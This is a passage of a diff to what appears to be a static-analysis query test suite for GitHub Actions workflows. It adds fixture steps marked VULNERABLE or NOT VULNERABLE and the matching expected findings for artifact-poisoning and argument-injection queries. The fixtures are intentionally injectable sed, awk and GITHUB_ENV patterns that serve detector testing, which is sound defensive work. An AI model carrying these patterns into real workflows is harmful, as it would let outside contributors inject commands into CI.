"${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | @@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -92,5 +88,8 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 42ba8bf2749..5d841e50dbb 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -13,36 +13,62 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref }} - - run: echo "s/FOO/$TITLE/g" - - run: sed "s/FOO/$TITLE/g" - - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - run: awk "BEGIN {$TITLE}" - - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | + # NOT VULNERABLE + echo "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + sed "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: | + # VULNERABLE + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + - run: | + # VULNERABLE + awk "BEGIN {$TITLE}" + - run: | + # VULNERABLE + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # VULNERABLE sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json - run: | + # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo - - - name: Checkout ref - uses: actions/checkout@v4 - with: - ref: ${{ github.event.pull_request.head.ref }} - - name: Detect new changesets - id: added-files - run: | - delimiter="$(openssl rand -hex 8)" - echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" - echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" - echo "${delimiter}" >> "${GITHUB_OUTPUT}" + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD ) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD^ | xargs) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # NOT VULNERABLE + echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + - run: | + # NOT VULNERABLE + git log -1 --pretty=%s + - run: | + # NOT VULNERABLE + BODY=$(git log --format=%s) + sed -E 's/\s+/\n/g' <<<"$BODY" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 1e4051fef43..bd0684d1711 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,29 +1,35 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| 